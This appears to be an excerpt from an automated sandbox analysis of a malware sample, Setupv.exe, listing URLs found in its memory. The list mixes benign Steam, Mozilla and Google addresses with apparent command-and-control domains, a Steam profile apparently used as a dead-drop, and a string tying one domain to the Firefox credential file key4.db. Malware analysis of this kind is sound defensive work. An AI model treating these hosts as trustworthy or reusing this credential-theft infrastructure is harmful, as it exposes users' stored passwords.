        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=Nvd4msBzMPzu&amp
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
        Source: Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=6Gx3WA4gUqN
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://geographys.run/H
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://geographys.run/m
Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://help.steampowered.com/en/
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://lv.queniujq.cn
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://medal.tv
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://player.vimeo.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://recaptcha.net/recaptcha/;
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://s.ytimg.com;
        Source: Setupv.exe | String found in binary or memory: https://sectigo.com/CPS0
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://sketchfab.com
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steam.tv/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast-test.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcast.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steambroadcastchat.akamaized.net
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/discussions/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/market/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/my/wishlist/
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CED000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C79000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199845513035/badges
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199845513035/inventory/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/765611998455130350
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/765611998455130351
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199845513035
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamloopback.host
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateAccept-Encod
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
        Source: Setupv.exe, 00000000.00000003.1719383928.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719676409.0000000003AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/f.ms1&
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/l/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top/xlakoam
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://topographky.top:443/xlak
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/
        Source: Setupv.exe, 00000000.00000003.1810483565.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/E
        Source: Setupv.exe, 00000000.00000003.1818208188.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/a
        Source: Setupv.exe, 00000000.00000002.1855899995.0000000003ABA000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810042007.0000000003B2F000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1817707824.0000000003B10000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1765225459.0000000003B2E000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1764418270.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1763600495.0000000003B3B000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1845565187.0000000003B2D000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000CE6000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1750829027.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qena
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenaJ
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenan
        Source: Setupv.exe, 00000000.00000002.1855899995.0000000003ABA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top/qenar
        Source: Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top:443/qenal
        Source: Setupv.exe, 00000000.00000003.1845958800.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853132454.0000000000C85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transdataa.digital/
        Source: Setupv.exe, 00000000.00000002.1853289958.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000C9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://transdataa.digital/xwpa
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/S
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxx
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tropiscbs.live/iuwxxr
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/
        Source: Setupv.exe, 00000000.00000002.1852863691.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/banb
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top/banb8
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000C82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vigorbridgoe.top:443/banb
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woodpeckersd.run/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woodpeckersd.run/glsk
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
        Source: Setupv.exe, 00000000.00000003.1766530993.0000000003AE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
        Source: Setupv.exe, 00000000.00000003.1719338047.0000000000D05000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Setupv.exe, 00000000.00000003.1736580878.0000000003AE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
        Source: Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1719414142.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1853289958.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1816496507.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1786932542.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818208188.0000000000D02000.00000004.00000020.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810483565.0000000000D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
        Source: Setupv.exe, 00000000.00000003.1765988082.0000000003F5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
